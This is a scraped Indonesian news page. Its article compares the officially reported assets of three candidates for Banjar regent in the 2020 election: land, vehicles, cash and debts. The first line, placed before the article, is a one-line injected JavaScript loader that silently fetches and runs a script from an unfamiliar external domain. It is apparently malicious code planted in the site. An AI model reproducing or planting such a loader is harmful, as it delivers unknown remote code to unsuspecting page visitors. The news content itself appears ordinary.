(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Intip Kekayaan Tiga Calon Bupati Banjar, Harta Calon Independen Kalahkan Calon Parpol


KANALKALIMANTAN.COM, MARTAPURA – Komisi Pemilihan Umum (KPU) Banjar telah menetapkan tiga pasangan calon Bupati dan Wakil Bupati pada ajang Pilkada 2020. Mereka adalah pasangan nomor urut 1 Saidi Mansyur – Habib Idrus Al Habsyie, pasangan nomor 2 Andin Sofyanoor-KH Syarif Busthomi, dan pasangan nomor urut 3 Haji Rusli-KH Fadhlan Asy’ari.

Ketiga paslon tersebut kini tengah memulai masa kampanye guna memenangkan puncak pesta demokrasi pada 9 Desember nanti. Berbagai macam jurus telah disiapkan para paslon untuk menjaring pemilih.

Menarik disimak, kekuatan finansial para kandidat yang bertarung di Pilkada Banjar. Dari laporan di situs resmi elhkpn.kpk.go.id yang dikelola oleh Komisi Pemberantasan Korupsi (KPK), diketahui daftar kekayaan para paslon.

Laporan harta kekayaan ini merupakan salah satu syarat utama para paslon saat mendaftarkan diri di KPU Banjar, pada awal September lalu.

Data yang didapatkan Kanalkalimantan.com dari situs tersebut, harta terbanyak digenggam oleh calon Bupati Banjar nomor urut 2, Andin Sofyanoor, yang notabenenya maju melalui jalur perseorangan. Sedangkan, peringkat dua yakni harta calon nomor urut 3 Haji Rusli, dan peringkat buncit calon Bupati Banjar nomor urut 1, Saidi Mansyur. (Selengkapnya lihat grafis, red)
Diketahui, Saidi Mansyur memiliki total kekayaan sebanyak Rp 3,3 milar atau rincinya Rp 3.345.001.812. Saidi -sapaan akrabnya- melaporkan harta kekayaanya tersebut pada 31 Desember 2019, saat masih menjabat sebagai Wakil Bupati Banjar periode 2016 – 2020.

Harta kekayaan pria kelahiran 5 Mei 1987 itu didominasi kepemilikan tanah dan alat transportasi. Saidi diketahui memiliki tiga lahan tanah, yang mana dua diantaranya berada di kota Banjarbaru dan satunya lagi berlokasi di Kabupaten Banjar. Seluruh tanahnya ini ditafsir memiliki nilai Rp 1,8 miliar.

Untuk kepemilikan alat transportasi, Bendahara Umum PSSI Kabupaten Banjar periode 2015-2020 itu memiliki sebanyak 6 unit mobil. Menariknya, 5 unit mobil di antaranya dibeli Saidi hanya dalam jangka waktu satu tahun, tepatnya pada 2010 silam.

Sementara itu, Saidi juga memiliki harta bergerak lainnya yang ditafsir senilai Rp 166 juta dan harta terakhirnya berada di kategori kas dan setara kas, senilai Rp 261 juta. Kendati demikian, Saidi diklaim memiliki utang sekitar Rp 103 juta.

Di sisi lain, Calon Bupati Banjar nomor urut 2, Andin Sofyanoor, tercatat memiliki harta kekayaan terbanyak dengan nominal mencapai Rp 8,3 miliar atau Rp 8.359.000.000. Ia tercatat melaporkan harta kekayaanya tersebut pada 31 Agustus 2020, beberapa hari jelang pendaftaran di KPU Banjar.

Adapun lumbung kekayaan Andin ini, dapat dikatakan 99 persennya hanya berasal dari kepemilikan tanah dan bangunan saja. Ia memiliki 16 lahan tanah kosong -tanpa bangunan- yang tersebar di dua wilayah, yakni di kota Banjarbaru dan Kabupaten Banjar.

Tak hanya itu saja , Andin juga memiliki 6 lahan tanah yang telah berisi bangunan dan salah satunya berada di Kabupaten Kotabaru. Seluruh kepemilikan tanah dan bangunan ini memiliki nilai menyentuh Rp 8,2 miliar.

Sementara, untuk alat transportasi, Andin hanya memiliki 1 unit mobil merek Suzuki, dengan nilai Rp 70 juta. Di kategori harta bergerak lainnya milik Andin ditafsir mencapai Rp 3 juta dan di kategori kas dan setara kas, ia memiliki Rp 18,5 juta.

Terakhir, calon Bupati Banjar nomor urut 3, Haji Rusli. Ia memiliki total kekayaan sebesar Rp 4,5 miliar atau rincinya Rp 4.528.573.961. Hal ini sebagaimana harta kekayaan yang dilaporkan Rusli pada 31 Desember 2019, saat masih menduduki kursi legislatif sebagai anggota DPRD Kalsel di Fraksi Partai Golkar -Golongan Karya-.

Mantan Ketua DPRD Kabupaten Banjar dua periode itu memiliki 5 lahan tanah berisi bangunan. Nilai seluruh tanah dan bangunan itu mencapai Rp 3,7 miliar. Ia juga tercatat hanya memiliki satu unit mobil sebagai alat transportasi yang harganya mencapai Rp 950 juta.

H Rusli yang juga memegang tongkat komando Partai Golkar di Kabupaten Banjar, sebagai Ketua DPD, memiliki surat berharga yang ditafsir nilainya Rp 250 juta. Untuk di kategori kas dan setara kas miliknya, ditafsir Rp 506,8 juta. Hanya saja Rusli, memiliki utang sekitar Rp 928 juta, yang menyebabkan total harta kekayaannya harus dikurangi dengan jumlah utang tersebut. (Kanalkalimantan.com/rico)

Reporter : Rico
Editor : Cell

 


Al Ghifari

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

54 menit ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

2 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

3 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

5 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

5 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

6 jam ago

This website uses cookies.